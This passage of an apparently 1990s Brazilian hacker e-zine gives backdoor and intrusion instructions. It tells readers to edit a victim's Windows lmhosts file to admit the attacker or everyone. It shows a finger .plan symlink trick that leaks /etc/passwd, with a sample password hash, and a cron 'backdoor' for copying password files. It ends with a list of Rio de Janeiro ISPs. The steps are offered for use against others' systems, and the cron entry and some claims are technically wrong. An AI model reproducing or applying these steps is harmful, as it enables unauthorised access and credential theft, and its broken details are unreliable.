$$$$$$$                           $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$
$$$$$$  8. Invasão de privacidade  $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$

-=-==-=-=-=-=-=-=-==-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=

	Insegurança no Windows 95.

	Existem muitos textos espalhados pela inet que falam que o comparti-
lhamento de arquivos do windows é insegura. Que qualquer um pode invadir o
seu sistema apenas sabendo o seu IP. Vou esclarecer estes textos para não fa-
larem mais bobagens por ai.

	Primeiro.. Veremos os seguintes arquivos:

\WINDOWS\services	=	Serviços udp/tcp
\WINDOWS\hosts.sam	=	exemplo de hosts
\WINDOWS\hosts		=	Nomes dados aos IPs
\WINDOWS\lmhosts.sam	=	exemplo de lmhosts
\WINDOWS\lmhosts	=	IPs de usuarios que podem mapear seu HD.
\WINDOWS\networks	=	Trabalhos que o Win executara em rede.

	Alguns arquivos dos listados acima você terá que criar. Todos os
demais são instalados junto com o protocolo TCP/IP.

	Agora compare-os com os arquivos de um UNIX. Vamos ver..

	Aki nos temos o services....no Linux também.
	Aki nos temos o hosts.......no Linux também.
	Aki nos temos o networks....no Linux também.
	Aki nos temos o lmhosts.....no Linux não.

	Tai o arquivo a ser modificado para implantar a backdoor. Em quanto
muitos dizem que nesse arquivo devem conter os IPs dos sistemas que você pode
mapear, seguindo akelas informações dos textos de invasão por IP.

	Você acha que a microsoft e' assim tão burra?? Tah, sim, mas não tan-
to a fazer um sistema aberto a mapeação apenas se descobrirem o seu ip. Isso
seria morte na certa.

	Ae você tera que implantar uma backdoor aqui..

	Esse arquivo funciona como o hosts.allow no Linux. Qualquer IP que
esteja ai pode acessar o seu sistema. Entaum logo depois de entrar no sistema
vc pega este arquivo e coloca o seu IP ou poe 'all	all'.

	Agora eh soh mapear o sistema do kra e pronto. Epa.. Não eh tão facil
assim, o kra tem que tar com os Arquivos compartilhados a rede.

	Hm.. repare em outros detalhes.. Tipo as portas 137 e 138(serviços
netbios) não estão no services. Entaum quer dizer que akeles textos que
diziam que o nuke oob poderia ser dado por qualquer serviço netbios tb estão
errados! Quanta coisa inventada naum? A unica porat que funciona para esse
nuke eh a 139(netbios-session).

	Outros serviços que podem te dar uma baita informação sobre o sistema
do kra estão aki disponiveis. Como o finger, systat, netstat, whois,...

	Ta ai explicada a velha "invasão por IP".

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  9. Hack, the Art  $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

	Essas backdoors foram retiradas da zine Axur05(vcs conhecem naum?)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Finger Backdoor

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Siga os passos:

1. Execute um finger no root
2. Linke o /etc/passwd no .plan (criado pelo finger). O arquivo .plan deverá
   estar no diretório home do root.
3. Execute novamente o finger no root. Surpresa!

	Se o finger estiver desabilitado no sistema, habilite-o tirando o seu
comentario no arquivo /etc/inetd.conf.
	Exemplo do que deve ser feito:

# finger root

    Login: root                             Name: The roouter
    Directory: /project                     Shell: /bin/bash
# cd ~
# ln -s /etc/passwd .plan
# finger root

    Login: root                             Name: The roouter
    Directory: /project                     Shell: /bin/bash
    On since Mon Sep 30 16:29 (EDT) on tty4
    On since Mon Sep 30 16:32 (EDT) on tty5   23 seconds idle
    Last login Mon Sep 30 16:54 (EDT) on tty6
    No mail.
    Plan:
    root:Jovl41fdofLrM:0:0:The roouter:/project:/bin/bash
    ...

	Não eh bem uma backdoor mas entendeu pra que serve neh.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Cron Backdoor

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Edite o arquivo /usr/lib/cron/cron.allow e adicione a seguinte linha.

00	24	1	*	*	"cat /etc/passwd /home/struck/.local"

	Com essa backdoor, de mes em mes vc atualizará a lista de senhas do
sistema, sendo que serão dirigidas todas para o arquivo /home/struck/.local
a meia-noite do 1o dia de cada mes.
	Agora explicando:

00	24	1	*	*	"cat /etc/passwd /home/struck/.local"
|	|	|	|	|	|
|	|	|	|	|	+---> Comando
|	|	|	|	|
|	|	|	|	+---> dia da semana(* = qquer dia)
|	|	|	|
|	|	|	+---> mes(* = todos)
|	|	|
|	|	+---> dia do mes(dia primeiro de todos os meses)
|	|
|	+---> hora
|
+---> minuto

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                 $$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  10. ¡¡¡BoNus!!!  $$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                 $$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Lista de provedores - Rio de Janeiro (1a parte)

* Provedor : AirNet
  Host : airnet.com.br
  Telefone : 5332084
  Email : comercial@airnet.com.br

* Provedor : AllNet
  Host : allnet.all.com.br
  Telefone : 2405068
  Email : mala@allnet.all.com.br

* Provedor : AlterNex®/IBASE
  Host : ibase.com.br
  Telefone : 5150500
             5150505
  Email : webmaster@alternex.com.br

* Provedor : Antares Provedor Internet
  Host : antares.com.br
  Telefone : 2330198
             2530625
  Email : comercial@antares.com.br

* Provedor : Arras Informatica e Tecnologia S/C Ltda
  Host : arras.com.br
  Telefone : 2241100
  Email : helpdesk@arras.com.br

* Provedor : BarraLink
  Host : barralink.com.br
  Telefone : 3253725
  Email : postmast@barralink.com.br

* Provedor : BIOHARDWARE Informatica Ltda
  Host : biohard.com.br
  Telefone : 5121868
             5122484
  Email : webmaster@biohard.com.br

* Provedor : CelNet
  Host : celnet.com.br
  Telefone : 5431270
  Email : info@pontocom.com.br

* Provedor : Centralcard
  Host : centralcard.com.br
  Telefone : 5332716
             2214015
  Email : webmaster@central.com.br

* Provedor : Centroin
  Host : centroin.com.br
  Telefone : 2956695
             5424849
             2952978
  Email : admin@centroin.com.br

* Provedor : CyberNet
  Host : cybernet.com.br
  Email : info@cybernet.com.br

* Provedor : DCNet
  Host : dcnet.com.br
  Telefone : 2335525
             2337050
  Email : DCNET@CAIXAPOSTAL.COM.BR

* Provedor : Digital HighWay
  Host : highway.com.br
  Telefone : 5121252
             2595845
  Email : webmaster@highway.com.br

* Provedor : Domain
  Host : domain.com.br
  Telefone : 5155055
  Email : contab@domain.com.br

* Provedor : EasyLine Provedor Internet
  Host : easyline.com.br
  Telefone : 5311700
             5310200
  Email : webmaster@easyline.com.br

* Provedor : Esquadro ISP
  Host : esquadro.com.br
  Email : webmaster@esquadro.com.br

* Provedor : FST Informatica Ltda.
  Host : fst.com.br
  Email : fst@fst.com.br

* Provedor : Hexanet Informatica
  Host : hexanet.com.br
  Telefone : 4331464
             2639027
             2333739
  Email : info@hexanet.com.br

* Provedor : Image Link
  Host : imagelink.com.br
  Telefone : 2670699
             5225850
  Email : suporte@imagelink.com.br

* Provedor : InterNexus Informatica Ltda.
  Host : inx.com.br
  Telefone : 5127030
             5127014
  Email : suporte@inx.com.br

* Provedor : Iptec
  Host : iptec.com.br
  Telefone : 5150403
             5150400
  Email : vendas@iptec.com.br

* Provedor : ISM
  Host : ism.com.br
  Telefone : 5333937
             5331055
  Email : ismnet@ism.com.br

* Provedor : M.I. Montreal Informatica
  Host : montreal.com.br
  Telefone : 5325700
             5336028
  Email : comercial@montreal.com.br

* Provedor : Marlin
  Host : marlin.com.br
  Telefone : 2031326
  Email : comercial@marlin.com.br

* Provedor : MLS Projetos Informatica
  Host : mls.com.br
  Telefone : 5378437
  Email : webmaster@mls.com.br

Total : 25 provedores.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

        Qualquer duvida, pergunta, proposta, besteira...
        Mail-me!
        cszine@hotmail.com
